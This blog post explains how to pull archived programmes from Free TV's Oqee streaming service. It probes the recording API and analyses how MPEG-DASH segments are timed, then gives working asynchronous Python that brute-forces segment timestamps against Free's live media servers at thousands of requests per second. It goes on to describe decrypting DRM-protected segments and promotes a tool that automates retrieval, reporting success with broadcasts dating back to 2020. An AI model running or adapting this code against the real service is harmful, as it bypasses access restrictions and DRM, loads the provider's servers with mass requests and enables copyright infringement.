Free TV, previously known as Oqee TV by Free, is now available to everyone at no cost. The platform offers over 170 live TV channels and an extensive VOD library. However, recordings and catch-up TV (replay) remain exclusive to Freebox subscribers, with recordings limited to 100 hours and requiring advance scheduling.

The interesting part, though, is that with some technical exploration, it’s possible to retrieve past content by exploiting how Free serves video using MPEG-DASH manifests. In this post, I’ll demonstrate how to brute-force timestamps to access historical content and explain why this works.

The API dead end

My first instinct was to explore the records API endpoint: perhaps the restrictions were merely UI limitations that could be bypassed with direct API calls.

Let’s test the boundaries with some Python:

    import time

    import requests

    headers = {
        'authorization': 'Bearer JWT',
        'x-fbx-rights-token': 'TOKEN',
        'x-oqee-profile': 'PROFILE_ID',
    }

    # Test 1: Attempting to record content that already aired
    start = int(time.time()) - 60  # 1 minute ago
    end = start + 60 * 60  # 1 hour duration

    data = {
        "channel_id": 536,
        "start": start,
        "end": end,
        "margin_before": 0,
        "margin_after": 0
    }

    response = requests.post(
        'https://api.oqee.net/api/v4/user/npvr/records',
        headers=headers,
        json=data
    )
    print(response.json())

Response:

    {
      "error": {
        "code": "start_in_past",
        "msg": "start in the past"
      },
      "success": false
    }

The API explicitly rejects any recording with a start time in the past.

What about the 4-hour maximum recording duration?

    # Test 2: Exceeding maximum recording duration
    start = int(time.time())
    end = start + 60 * 60 * 5  # 5 hours duration

    data["start"] = start
    data["end"] = end
    # Re-send the same POST request as in Test 1 with the updated payload

Response:

    {
      "error": {
        "code": "record_too_long",
        "msg": "recording maximum duration is 4 hours"
      },
      "success": false
    }

Hard limit confirmed at 4 hours.

The recording margins (the buffer time before and after recording) are also strictly controlled. Interestingly, these margin options no longer appear in the UI, yet the API still validates them:

    # Test 3: Exceeding margin limits
    start = int(time.time())
    end = start + 60 * 60 * 2  # 2 hours duration

    margin_before = int(60 * 60 * 1.01)  # 3636 s = 1 h 0 min 36 s (just over the 1-hour max)
    margin_after = 60 * 60 * 1  # 1 hour

    data["start"] = start
    data["end"] = end
    data["margin_before"] = margin_before
    data["margin_after"] = margin_after
    # Re-send the same POST request as in Test 1 with the updated payload

Response:

    {
      "error": {
        "code": "invalid_request",
        "msg": "Invalid request {'margin_before': ['max_value']}"
      },
      "success": false
    }

Exceeding the margin by even a few seconds triggers validation errors. The margins are capped at one hour each.

API testing revealed several hard constraints:

- Recordings cannot be scheduled in the past.

- The maximum recording duration: 4 hours

- The maximum margin before/after: 1 hour each

- Server-side validation cannot be bypassed.
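To restate these constraints compactly, here is a minimal sketch of a local pre-check that mirrors the three error codes observed above. The function name, the order of the checks, and whether a recording of exactly 4 hours or a margin of exactly 1 hour is accepted are assumptions; only the limits and error codes come from the responses.

```python
import time

MAX_DURATION = 4 * 60 * 60  # seconds, taken from the "record_too_long" message
MAX_MARGIN = 60 * 60        # seconds, taken from the margin "max_value" error


def check_record_request(start, end, margin_before=0, margin_after=0, now=None):
    """Return the error code the API is expected to answer with, or None.

    Hypothetical helper: the real server-side logic is not known.
    """
    now = time.time() if now is None else now
    if start < now:
        return "start_in_past"
    if end - start > MAX_DURATION:
        return "record_too_long"
    if margin_before > MAX_MARGIN or margin_after > MAX_MARGIN:
        return "invalid_request"
    return None


now = 1_700_000_000  # arbitrary fixed "current time" so the demo is repeatable
print(check_record_request(now - 60, now + 3540, now=now))         # start_in_past
print(check_record_request(now, now + 5 * 3600, now=now))          # record_too_long
print(check_record_request(now, now + 7200, 3636, 3600, now=now))  # invalid_request
print(check_record_request(now, now + 7200, 3600, 3600, now=now))  # None
```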

As the recording API is a dead end, a different approach is needed. Understanding the underlying streaming protocol is therefore crucial.

Understanding MPEG-DASH manifests

When you request a video stream, the player fetches an MPEG-DASH manifest, an XML file that describes how to access the video segments. Here’s a simplified example:

    <?xml version="1.0" encoding="UTF-8"?>
    <MPD xmlns="urn:mpeg:dash:schema:mpd:2011" type="dynamic"
         availabilityStartTime="1970-01-01T00:00:00Z">
      <Period id="0" start="PT0S">
        <AdaptationSet id="0" contentType="video">
          <Representation id="video_720p"
                          bandwidth="3000000"
                          codecs="avc1.64001f"
                          mimeType="video/mp4"
                          width="1280"
                          height="720">
            <SegmentTemplate
                timescale="90000"
                initialization="https://media.example.com/video_init"
                media="https://media.example.com/video_$Time$">
              <SegmentTimeline>
                <S t="158967438326280" d="288000" r="4501"/>
              </SegmentTimeline>
            </SegmentTemplate>
          </Representation>
        </AdaptationSet>
      </Period>
    </MPD>

Let’s decode the critical line: <S t="158967438326280" d="288000" r="4501"/>

- t (time): starting timestamp in ticks (timescale units): 158967438326280

- d (duration): duration of each segment in ticks: 288000

- r (repeat): number of times the pattern repeats after the first segment: 4501 (so 4502 segments in total)

- timescale: ticks per second: 90000
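As an illustration, these values can be read programmatically with Python's standard library. This is a minimal sketch run against a trimmed copy of the example manifest above; a real manifest may contain several representations and several S entries, which this snippet does not handle.

```python
import xml.etree.ElementTree as ET

# Trimmed copy of the simplified example manifest
MPD_SNIPPET = """<MPD xmlns="urn:mpeg:dash:schema:mpd:2011">
  <Period><AdaptationSet><Representation id="video_720p">
    <SegmentTemplate timescale="90000"
                     media="https://media.example.com/video_$Time$">
      <SegmentTimeline>
        <S t="158967438326280" d="288000" r="4501"/>
      </SegmentTimeline>
    </SegmentTemplate>
  </Representation></AdaptationSet></Period>
</MPD>"""

# MPD elements live in the DASH namespace, so lookups need a prefix map
NS = {"dash": "urn:mpeg:dash:schema:mpd:2011"}

root = ET.fromstring(MPD_SNIPPET)
template = root.find(".//dash:SegmentTemplate", NS)
s = template.find("dash:SegmentTimeline/dash:S", NS)

timescale = int(template.get("timescale"))
t = int(s.get("t"))
d = int(s.get("d"))
r = int(s.get("r", "0"))  # r is optional in DASH and defaults to 0

segment_seconds = d / timescale            # length of one segment
window_seconds = (r + 1) * d / timescale   # r counts repeats after the first

print(t, d, r, timescale)  # 158967438326280 288000 4501 90000
print(segment_seconds, window_seconds)
```

With r = 4501 the timeline describes 4502 segments of 3.2 seconds each, which is roughly four hours of video.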

Converting ticks to real time

With a timescale of 90000 ticks per second:

- Each segment duration: 288000 / 90000 = 3.2 seconds

- Each tick represents: 1 / 90000 ≈ 0.000011 seconds

The URL template https://media.example.com/video_$Time$ generates actual segment URLs by replacing $Time$ with the tick value:

https://media.example.com/video_158967438326280

https://media.example.com/video_158967438614280 (+ 288000 ticks)

https://media.example.com/video_158967438902280 (+ 288000 ticks)
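The expansion above can be sketched as a small generator. The function name is hypothetical, and the sketch only handles a single S entry with a $Time$ placeholder, as in the example manifest.

```python
def expand_segment_urls(media_template, t, d, r):
    """Yield one URL per segment described by a single <S t d r> entry."""
    for i in range(r + 1):  # r counts the repeats after the first segment
        yield media_template.replace("$Time$", str(t + i * d))


urls = expand_segment_urls(
    "https://media.example.com/video_$Time$",
    t=158967438326280,
    d=288000,
    r=4501,
)
first_three = [next(urls) for _ in range(3)]
for url in first_three:
    print(url)
# https://media.example.com/video_158967438326280
# https://media.example.com/video_158967438614280
# https://media.example.com/video_158967438902280
```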

The vulnerability: predictable timing

The critical insight here is that if you know one valid timestamp, you can calculate ANY other timestamp because segments are spaced at fixed, predictable intervals.

Given a known segment URL like https://media.example.com/video_158967438326280:

To access past content:

1 hour ago = base_tick - (3600 seconds × 90000 ticks/sec ÷ 288000 per segment) × 288000

= base_tick - (1125 × 288000)

To access future content:

3 hours ahead = base_tick + (3 × 1125 × 288000)

The segment spacing is completely deterministic; there is no randomisation or authentication tokens, just arithmetic.
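The same arithmetic in Python, as a minimal sketch. The helper name is hypothetical; the constants are the timescale and segment duration from the example manifest.

```python
TIMESCALE = 90_000        # ticks per second
SEGMENT_TICKS = 288_000   # ticks per segment (3.2 s)


def shift_tick(base_tick, seconds):
    """Shift base_tick by the whole number of segments closest to `seconds`.

    Negative values go back in time, positive values go forward.
    """
    segments = round(seconds * TIMESCALE / SEGMENT_TICKS)
    return base_tick + segments * SEGMENT_TICKS


base_tick = 158967438326280
one_hour_ago = shift_tick(base_tick, -3600)
three_hours_ahead = shift_tick(base_tick, 3 * 3600)

print(base_tick - one_hour_ago == 1125 * SEGMENT_TICKS)           # True
print(three_hours_ahead - base_tick == 3 * 1125 * SEGMENT_TICKS)  # True
```

Because the shift is always a whole number of segments, the result stays aligned with the segment grid of the base tick.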

The main obstacle is obtaining the initial valid timestamp. Manifests rotate daily, so accessing content from earlier in the current day is straightforward (you can use the manifest’s current timestamp), but going further back requires knowledge of a historical tick value.

Let’s solve this with a brute-force approach.

Building the time conversion toolkit

First, I created helper functions to convert between ticks and human-readable time:

    import datetime


    def convert_ticks_to_sec(ticks, timescale):
        """Convert ticks to seconds."""
        return ticks / timescale


    def convert_sec_to_ticks(seconds, timescale):
        """Convert seconds to ticks."""
        return seconds * timescale


    def convert_sec_to_date(seconds, offset_hours=1):
        """Convert seconds to datetime with UTC offset."""
        dt = datetime.datetime.utcfromtimestamp(seconds) + datetime.timedelta(
            hours=offset_hours
        )
        return dt


    def convert_date_to_sec(dt, offset_hours=1):
        """Convert datetime to seconds with UTC offset."""
        epoch = datetime.datetime(1970, 1, 1)
        utc_dt = dt - datetime.timedelta(hours=offset_hours)
        return (utc_dt - epoch).total_seconds()


    def convert_date_to_ticks(dt, timescale, offset_hours=1):
        """Convert datetime to ticks with UTC offset."""
        return int(round(convert_date_to_sec(dt, offset_hours) * timescale))
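One caveat: the default offset_hours=1 matches French winter time (CET, UTC+1) but not summer time (CEST, UTC+2). As a hedged alternative, the sketch below works with timezone-aware datetimes so the offset travels with the value. The function names are hypothetical and are not part of the helpers above.

```python
from datetime import datetime, timedelta, timezone


def aware_date_to_ticks(dt, timescale=90_000):
    """Convert a timezone-aware datetime to ticks since the Unix epoch."""
    if dt.tzinfo is None:
        raise ValueError("expected a timezone-aware datetime")
    return round(dt.timestamp() * timescale)


def ticks_to_utc_date(ticks, timescale=90_000):
    """Convert ticks since the Unix epoch to an aware UTC datetime."""
    return datetime.fromtimestamp(ticks / timescale, tz=timezone.utc)


cet = timezone(timedelta(hours=1))  # fixed UTC+1, valid for a December date
noon = datetime(2025, 12, 19, 12, 0, tzinfo=cet)

ticks = aware_date_to_ticks(noon)
print(ticks)                     # 158952780000000
print(ticks_to_utc_date(ticks))  # 2025-12-19 11:00:00+00:00
```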

Calculating the nearest segment

Once you have a valid base tick, this function calculates the closest segment to any target time:

    def find_nearest_tick_by_hour(base_tick, dt, timescale, duration, offset_hours=1):
        """Find the nearest tick for a given datetime."""
        target_ticks = convert_date_to_ticks(dt, timescale, offset_hours)
        diff_ticks = base_tick - target_ticks
        rep_estimate = diff_ticks / duration

        if rep_estimate < 0:
            # Target is in the future from base
            rep = int(round(abs(rep_estimate)))
            nearest_tick = base_tick + rep * duration
        else:
            # Target is in the past from base
            rep = int(round(rep_estimate))
            nearest_tick = base_tick - rep * duration

        return nearest_tick, rep


    # Find content from 2 hours ago
    past_time = datetime.datetime.now() - datetime.timedelta(hours=2)
    tick, rep = find_nearest_tick_by_hour(
        base_tick=158967438326280,
        dt=past_time,
        timescale=90000,
        duration=288000
    )
    # Result: tick = 158968350998280, rep = 3169
    # URL: https://media.example.com/video_158968350998280

The bruteforce approach

But what if you don’t have a valid tick to start with? Here’s where the mathematical guarantee comes in: since segments occur every 288000 ticks, at least one valid segment MUST exist within any 288000-tick window.

This means we can bruteforce our way to a valid timestamp by testing up to 288000 sequential tick values.
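To make the guarantee concrete, here is a small offline sketch (no network involved). It assumes the segment start ticks of a track form a single regular grid with a step of 288000 ticks; the helper name is hypothetical. The numbers are the ones from the run shown further down.

```python
def offset_to_first_segment(window_start, known_tick, duration=288_000):
    """Ticks between window_start and the first segment start at or after it.

    Assumes every segment start on the track equals known_tick plus a whole
    multiple of `duration`.
    """
    return (known_tick - window_start) % duration


window_start = 158952780000000  # 2025-12-19 12:00 (UTC+1) expressed in ticks
valid_tick = 158952780040500    # tick reported by the bruteforce run

offset = offset_to_first_segment(window_start, valid_tick)
print(offset)  # 40500, so the scan hits a segment after 40500 candidates

# Any other segment on the same grid gives the same offset
print(offset_to_first_segment(window_start, valid_tick + 10 * 288_000))  # 40500
```

The result is always between 0 and 287999, which is why scanning 288000 consecutive values is enough.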

Implementing efficient bruteforce

Given the scale of requests needed (potentially 288000, 144000 on average), I used asyncio and aiohttp for concurrent requests instead of synchronous calls:

    import asyncio

    import aiohttp
    from tqdm import tqdm


    async def fetch_segment(session, ticks, track_id):
        """Fetch a media segment asynchronously; return ticks on HTTP 200, else None."""
        url = f"https://media.stream.proxad.net/media/{track_id}_{ticks}"
        headers = {
            "Accept": "*/*",
            "Referer": "https://tv.free.fr/",
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36",
        }
        try:
            # ClientTimeout is the supported way to set a timeout in aiohttp
            timeout = aiohttp.ClientTimeout(total=5)
            async with session.get(url, headers=headers, timeout=timeout) as resp:
                if resp.status == 200:
                    return ticks
                return None
        except (aiohttp.ClientError, asyncio.TimeoutError):
            return None


    async def bruteforce(track_id, date):
        """Bruteforce segments to find valid ticks, starting at the tick value `date`."""
        valid_ticks = []
        total_requests = 288000  # Guaranteed to contain at least one segment
        batch_size = 20000  # Process in batches for progress tracking

        async with aiohttp.ClientSession() as session:
            for batch_start in range(0, total_requests, batch_size):
                batch_end = min(batch_start + batch_size, total_requests)
                tasks = [
                    fetch_segment(session, t + date, track_id)
                    for t in range(batch_start, batch_end)
                ]

                results = []
                for coro in tqdm(
                    asyncio.as_completed(tasks),
                    total=len(tasks),
                    desc="Bruteforce",
                    unit="req"
                ):
                    result = await coro
                    results.append(result)

                valid_ticks.extend([r for r in results if r is not None])
                if valid_ticks:
                    print(f"Found {len(valid_ticks)} valid tick(s), stopping search.")
                    break

        return valid_ticks

I made a few optimizations to the bruteforce process:

- Processes 20000 requests at a time for memory efficiency

- Stops after the first batch that contains a valid tick

- Uses asyncio to send thousands of requests in parallel

- Displays real-time progress using tqdm
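Batching is one way to bound the work in flight. Another common option, shown here as a hedged sketch rather than what the code above does, is to cap concurrency with asyncio.Semaphore. To keep the example runnable offline, fake_probe is a hypothetical stand-in for fetch_segment, and the "valid" phase of 40500 is invented for the demo.

```python
import asyncio


async def probe_all(probe, candidates, limit=100):
    """Run probe(c) for every candidate with at most `limit` running at once.

    Returns the non-None results, in candidate order.
    """
    semaphore = asyncio.Semaphore(limit)

    async def guarded(candidate):
        async with semaphore:
            return await probe(candidate)

    results = await asyncio.gather(*(guarded(c) for c in candidates))
    return [r for r in results if r is not None]


async def fake_probe(tick):
    """Hypothetical stand-in for an HTTP request: no network access."""
    await asyncio.sleep(0)  # yield to the event loop like real I/O would
    return tick if tick % 288_000 == 40_500 else None


hits = asyncio.run(probe_all(fake_probe, range(30_000, 50_000)))
print(hits)  # [40500]
```

With a real HTTP client, the limit would need tuning against what the server and the local connection pool tolerate.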

Running the bruteforce

    import asyncio

    # Target: December 19, 2025 at 12:00:00
    target_date = datetime.datetime.strptime("2025-12-19 12:00:00", "%Y-%m-%d %H:%M:%S")
    approximate_ticks = int(convert_sec_to_ticks(
        convert_date_to_sec(target_date),
        90000
    ))

    # Run bruteforce
    valid_ticks = asyncio.run(bruteforce("0_1_382", approximate_ticks))
    print(f"Valid ticks found: {valid_ticks}")

The output is the following:

    Bruteforce: 100%|█████████| 20000/20000 [00:05<00:00, 3560.91req/s]
    Bruteforce: 100%|█████████| 20000/20000 [00:05<00:00, 3704.17req/s]
    Bruteforce: 100%|█████████| 20000/20000 [00:05<00:00, 3730.00req/s]
    Found 1 valid tick(s), stopping search.
    Valid ticks found: [158952780040500]

In this example, the bruteforce found a valid tick after checking approximately 60000 values in about 15 seconds, a rate of ~3600 requests per second.
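The same back-of-the-envelope arithmetic gives the worst and average cases, assuming the rate of about 3600 requests per second observed in this run holds for the whole search (it may not on another connection or if the server throttles).

```python
def estimated_seconds(candidates, requests_per_second=3600):
    """Rough wall-clock estimate for probing `candidates` tick values."""
    return candidates / requests_per_second


worst_case = estimated_seconds(288_000)  # full window scanned
average = estimated_seconds(144_000)     # half the window on average

print(worst_case)  # 80.0
print(average)     # 40.0
```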

Putting it all together

Once you have a valid tick from bruteforce, you can now access any content in the timeline:

    # Get the base tick from bruteforce
    base_tick = valid_ticks[0]  # 158952780040500

    # Want content from 6 hours earlier?
    six_hours_ago = datetime.datetime.now() - datetime.timedelta(hours=6)
    past_tick, _ = find_nearest_tick_by_hour(
        base_tick=base_tick,
        dt=six_hours_ago,
        timescale=90000,
        duration=288000
    )

    url = f"https://media.stream.proxad.net/media/0_1_382_{past_tick}"
    print(f"Segment URL: {url}")

Output:

    Segment URL: https://media.stream.proxad.net/media/0_1_382_158967224104500

Next steps: automation

The next logical step is to automate the entire workflow:

- Brute-force a valid tick for the target date.

- Calculate all segment ticks for the desired time range.

- Download all video and audio segments.

- Decrypt the segments (as they are DRM-protected).

- Concatenate the segments to create a playable video file.
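The second step is plain arithmetic once a base tick is known. Here is a minimal sketch, assuming a constant segment duration of 288000 ticks over the whole range; the function name is hypothetical and this is not necessarily how OqeeRewind implements it.

```python
def ticks_for_range(base_tick, start_tick, end_tick, duration=288_000):
    """List the segment ticks, aligned to base_tick, covering [start_tick, end_tick)."""
    # Index, relative to base_tick, of the segment that contains start_tick.
    # Floor division also rounds down correctly when start_tick < base_tick.
    first_index = (start_tick - base_tick) // duration
    first_tick = base_tick + first_index * duration
    return list(range(first_tick, end_tick, duration))


base_tick = 158952780040500      # valid tick found by the bruteforce
start_tick = 158952780000000     # 2025-12-19 12:00:00 (UTC+1) in ticks
end_tick = start_tick + 10 * 90_000  # ten seconds later

ticks = ticks_for_range(base_tick, start_tick, end_tick)
print(len(ticks))  # 4 segments of 3.2 s cover the 10-second range
print(ticks[0])    # 158952779752500, the segment already playing at start_tick
```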

To simplify this process, I created OqeeRewind, a tool that automates the entire pipeline. It handles brute forcing, downloading segments, decryption and video assembly, making retrieval straightforward.

Random notes

Available tracks across all channels

Every channel on Free TV offers the same set of tracks with varying quality options for different bandwidth and device capabilities.

Video tracks:

| Resolution | FPS | Codec | Bitrate |
|---|---|---|---|
| 384×216 | 25 | avc1.64000d | 400 kbps |
| 640×360 | 25 | avc1.64001e | 800 kbps |
| 896×504 | 25 | avc1.64001f | 1.6 Mbps |
| 1280×720 | 25 | avc1.64001f | 3.0 Mbps |
| 896×504 | 50 | hvc1.1.2.L93.90 | 1.6 Mbps |
| 1920×1080 | 50 | hvc1.1.2.L123.90 | 4.8 Mbps |
| 1920×1080 | 50 | hvc1.1.2.L123.90 | 14.8 Mbps |

Audio tracks:

| Language | Role | Codec | Bitrate |
|---|---|---|---|
| fra | main | mp4a.40.2 (AAC-LC) | 64 kbps |
| und | main | mp4a.40.2 (AAC-LC) | 64 kbps |
| fra | description | mp4a.40.2 (AAC-LC) | 64 kbps |

Subtitle tracks:

| Language | Role | Codec | Format |
|---|---|---|---|
| fra | caption | stpp | TTML in MP4 |
| fra | subtitle | stpp | TTML in MP4 |

These don’t seem to contain any content currently.

How far back does the content go?

To understand the temporal depth of available content, I examined TF1’s manifest (https://api-proxad.oqee.net/playlist/v1/live/612/1/live.mpd) and bruteforced the oldest accessible segments for each track:

Tracks:

| Rep ID | Resolution / Language | FPS / Role | Codec | Bitrate | Oldest date | Oldest tick |
|---|---|---|---|---|---|---|
| 376 | fra | main | mp4a.40.2 (AAC-LC) | 64 kbps | 2020-09-18 | 144038412002096 |
| 377 | und | main | mp4a.40.2 (AAC-LC) | 64 kbps | 2020-09-18 | 144038412002096 |
| 379 | 384×216 | 25 | avc1.64000d | 400 kbps | 2020-09-18 | 144038412021420 |
| 380 | 640×360 | 25 | avc1.64001e | 800 kbps | 2020-09-18 | 144038412021420 |
| 381 | 896×504 | 25 | avc1.64001f | 1.6 Mbps | 2020-09-18 | 144038412021420 |
| 382 | 1280×720 | 25 | avc1.64001f | 3.0 Mbps | 2020-09-18 | 144038412021420 |
| 463 | fra | description | mp4a.40.2 (AAC-LC) | 64 kbps | 2020-09-18 | 144038412002096 |
| 6658 | 896×504 | 50 | hvc1.1.2.L93.90 | 1.6 Mbps | 2025-12-02 | 158820588030870 |
| 6659 | 1920×1080 | 50 | hvc1.1.2.L123.90 | 4.8 Mbps | 2025-12-02 | 158820588030870 |
| 6661 | 1920×1080 | 50 | hvc1.1.2.L123.90 | 14.8 Mbps | 2025-12-02 | 158820588030870 |
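The oldest video ticks in the table can be converted back to dates as a sanity check. This sketch assumes the 90000 ticks-per-second timescale used for track 382 earlier also applies to the HEVC tracks; the audio tracks are left out because their timescale is not stated here.

```python
from datetime import datetime, timezone

# Oldest ticks reported for the video tracks in the table
OLDEST_VIDEO_TICKS = {
    "AVC (379-382)": 144038412021420,
    "HEVC (6658-6661)": 158820588030870,
}


def tick_to_utc(tick, timescale=90_000):
    """Convert a tick value to an aware UTC datetime (timescale is assumed)."""
    return datetime.fromtimestamp(tick / timescale, tz=timezone.utc)


for label, tick in OLDEST_VIDEO_TICKS.items():
    print(label, tick_to_utc(tick).strftime("%Y-%m-%d %H:%M:%S"), "UTC")
# AVC (379-382) 2020-09-18 11:00:00 UTC
# HEVC (6658-6661) 2025-12-02 11:00:00 UTC
```

Both results agree with the dates listed in the table.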

It seems that if you want to access content older than a few weeks, you must use the AVC tracks. HEVC tracks won’t work for content before December 2025, and may be erased sooner due to storage constraints.

I was able to retrieve content from TF1 as far back as September 2020 using the AVC tracks.

After some further testing, however, I was able to download an HEVC segment from December 14, 2023.



Proof of concept: retrieving years-old content

To validate this approach, I successfully retrieved several high-profile French TV broadcasts from years past:

- Koh-Lanta Finale (December 4, 2020)

- Koh-Lanta Finale (June 4, 2021)

- The Voice Finale (May 21, 2022)

- Complément d’enquête (December 14, 2022)

Go try OqeeRewind and see what hidden gems you can uncover from Free TV’s archives! Feel free to star the repo if you find it useful :)